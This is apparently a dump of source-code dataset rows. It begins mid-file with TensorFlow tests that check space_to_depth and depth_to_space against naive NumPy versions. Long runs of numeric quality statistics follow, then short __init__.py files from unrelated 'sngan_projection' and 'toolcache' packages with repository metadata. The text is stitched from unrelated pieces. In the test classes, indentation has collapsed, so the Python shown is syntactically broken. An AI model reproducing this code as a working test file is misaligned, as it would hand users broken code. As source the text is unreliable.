        y = np.transpose(
            y, list(range(len(y.shape) - 5)) + [-5, -3, -4, -2, -1])
        y = np.reshape(y, (x.shape[:-3] + (h2, w2, c2)))
    else:
        c, h, w = x.shape[-3:]
        h2, w2, c2 = h // bs, w // bs, c * bs * bs
        y = np.reshape(x, x.shape[:-3] + (c,) + (h2, bs) + (w2, bs))
        y = np.transpose(
            y, list(range(len(y.shape) - 5)) + [-3, -1, -5, -4, -2])
        y = np.reshape(y, (x.shape[:-3] + (c2, h2, w2)))
    return y


def patched_depth_to_space(input, block_size, data_format):
    input = input_maybe_to_channels_last(input, data_format=data_format)
    output = tf_depth_to_space(
        input=input, block_size=block_size, data_format='NHWC')
    output = output_maybe_to_channels_first(output, data_format=data_format)
    return output


def naive_depth_to_space(x, bs, channels_last):
    if channels_last:
        h, w, c = x.shape[-3:]
        h2, w2, c2 = h * bs, w * bs, c // (bs * bs)
        y = np.reshape(x, x.shape[:-3] + (h, w, bs, bs, c2))
        y = np.transpose(
            y, list(range(len(y.shape) - 5)) + [-5, -3, -4, -2, -1])
        y = np.reshape(y, (x.shape[:-3] + (h2, w2, c2)))
    else:
        c, h, w = x.shape[-3:]
        h2, w2, c2 = h * bs, w * bs, c // (bs * bs)
        y = np.reshape(x, x.shape[:-3] + (bs, bs, c2, h, w))
        y = np.transpose(
            y, list(range(len(y.shape) - 5)) + [-3, -2, -5, -1, -4])
        y = np.reshape(y, (x.shape[:-3] + (c2, h2, w2)))
    return y
class SpaceToDepthTestCase(tf.test.TestCase):
def test_space_to_depth(self):
with self.test_session() as sess, \
mock.patch('tensorflow.space_to_depth', patched_space_to_depth):
# static shape, bs = 2, channels_last = True
x = np.random.normal(size=[5, 8, 12, 7]).astype(np.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x, 2, True)),
naive_space_to_depth(x, 2, True)
)
# static shape, bs = 3, channels_last = False
x = np.random.normal(size=[4, 5, 7, 6, 9]).astype(np.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x, 3, False)),
naive_space_to_depth(x, 3, False)
)
# dynamic shape, bs = 2, channels_last = True
x = np.random.normal(size=[4, 5, 8, 12, 7]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, None, None, None, 7],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x_ph, 2, True), feed_dict={x_ph: x}),
naive_space_to_depth(x, 2, True)
)
# dynamic shape, bs = 3, channels_last = False
x = np.random.normal(size=[5, 7, 6, 9]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, 7, None, None],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x_ph, 3, False), feed_dict={x_ph: x}),
naive_space_to_depth(x, 3, False)
)
class DepthToSpaceTestCase(tf.test.TestCase):
def test_depth_to_space(self):
with self.test_session() as sess, \
mock.patch('tensorflow.depth_to_space', patched_depth_to_space):
# static shape, bs = 2, channels_last = True
x = np.random.normal(size=[5, 4, 6, 28]).astype(np.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x, 2, True)),
naive_depth_to_space(x, 2, True)
)
# static shape, bs = 3, channels_last = False
x = np.random.normal(size=[4, 5, 63, 2, 3]).astype(np.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x, 3, False)),
naive_depth_to_space(x, 3, False)
)
# dynamic shape, bs = 2, channels_last = True
x = np.random.normal(size=[4, 5, 4, 6, 28]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, None, None, None, 28],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x_ph, 2, True), feed_dict={x_ph: x}),
naive_depth_to_space(x, 2, True)
)
# dynamic shape, bs = 3, channels_last = False
x = np.random.normal(size=[5, 63, 2, 3]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, 63, None, None],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x_ph, 3, False), feed_dict={x_ph: x}),
naive_depth_to_space(x, 3, False)
)
| 41.035971 | 80 | 0.547861 | 828 | 5,704 | 3.571256 | 0.107488 | 0.040243 | 0.068989 | 0.039567 | 0.858979 | 0.809604 | 0.802164 | 0.764964 | 0.764964 | 0.73791 | 0 | 0.04119 | 0.310484 | 5,704 | 138 | 81 | 41.333333 | 0.710653 | 0.061536 | 0 | 0.5 | 0 | 0 | 0.010853 | 0.009356 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.055556 | false | 0 | 0.046296 | 0 | 0.157407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc3ba752a40f0e57983b61bc49acece5b6ef57a3 | 466 | py | Python | sngan_projection/links/__init__.py | tanikawa04/sngan_projection | cb463dd30ad485b0bbaef945728251153edba920 | [
"MIT"
] | null | null | null | sngan_projection/links/__init__.py | tanikawa04/sngan_projection | cb463dd30ad485b0bbaef945728251153edba920 | [
"MIT"
] | null | null | null | sngan_projection/links/__init__.py | tanikawa04/sngan_projection | cb463dd30ad485b0bbaef945728251153edba920 | [
"MIT"
] | null | null | null | from sngan_projection.links.categorical_conditional_batch_normalization import CategoricalConditionalBatchNormalization
from sngan_projection.links.conditional_batch_normalization import ConditionalBatchNormalization
from sngan_projection.links.sn_convolution_2d import SNConvolution2D
from sngan_projection.links.sn_convolution_nd import SNConvolutionND
from sngan_projection.links.sn_embed_id import SNEmbedID
from sngan_projection.links.sn_linear import SNLinear
| 66.571429 | 119 | 0.922747 | 54 | 466 | 7.62963 | 0.407407 | 0.131068 | 0.276699 | 0.349515 | 0.305825 | 0.179612 | 0 | 0 | 0 | 0 | 0 | 0.004525 | 0.051502 | 466 | 6 | 120 | 77.666667 | 0.927602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc87759f00df90701c53a9670035c9d27c594fce | 152 | py | Python | toolcache/cachetypes/__init__.py | sslivkoff/toolcache | 62fb3441adb03fdee4fdbca14605f0ecec2ad44c | [
"Apache-2.0"
] | null | null | null | toolcache/cachetypes/__init__.py | sslivkoff/toolcache | 62fb3441adb03fdee4fdbca14605f0ecec2ad44c | [
"Apache-2.0"
] | null | null | null | toolcache/cachetypes/__init__.py | sslivkoff/toolcache | 62fb3441adb03fdee4fdbca14605f0ecec2ad44c | [
"Apache-2.0"
] | null | null | null | from .base_cache import BaseCache
from .disk_cache import DiskCache
from .memory_cache import MemoryCache
from .cachetype_utils import get_cache_class
| 25.333333 | 44 | 0.861842 | 22 | 152 | 5.681818 | 0.590909 | 0.264 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111842 | 152 | 5 | 45 | 30.4 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |